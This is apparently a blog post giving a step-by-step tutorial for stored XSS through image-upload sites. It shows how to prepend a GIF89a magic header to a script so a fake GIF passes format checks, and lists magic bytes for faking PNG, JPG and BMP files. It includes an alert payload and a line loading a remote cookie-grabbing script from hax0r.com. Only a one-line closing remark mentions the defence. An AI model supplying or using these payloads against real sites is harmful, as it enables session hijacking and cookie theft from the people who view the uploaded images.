Make Haxored.gif in paint for exemple
after open Haxored.GIF in notepad
delete all line and insert this:
GIF89a<script>alert("XSS")</script>
save and close it
upload Haxored.gif in a free image hoster look your image
and XSS is here...
dont take Mozillia Firefox for look your image but Mozillia dont run your alert
use Internet explorer
Why add GIF89a ?
well some upload like this one, check that the 'GIF89a' code
is contained in the image as in any .GIF respective.
the vulnerability of this upload results from the checking 'GIF89a' code
for confirmation but of nothing the possible malicious codes contained in this image.
GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>
to know the code for another image format,
it is just enough to open an image jpg or other with a text editor,
for example a png file: ‰PNG
PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ
For secure it dont check getimagesize() only
0 komentar:
Posting Komentar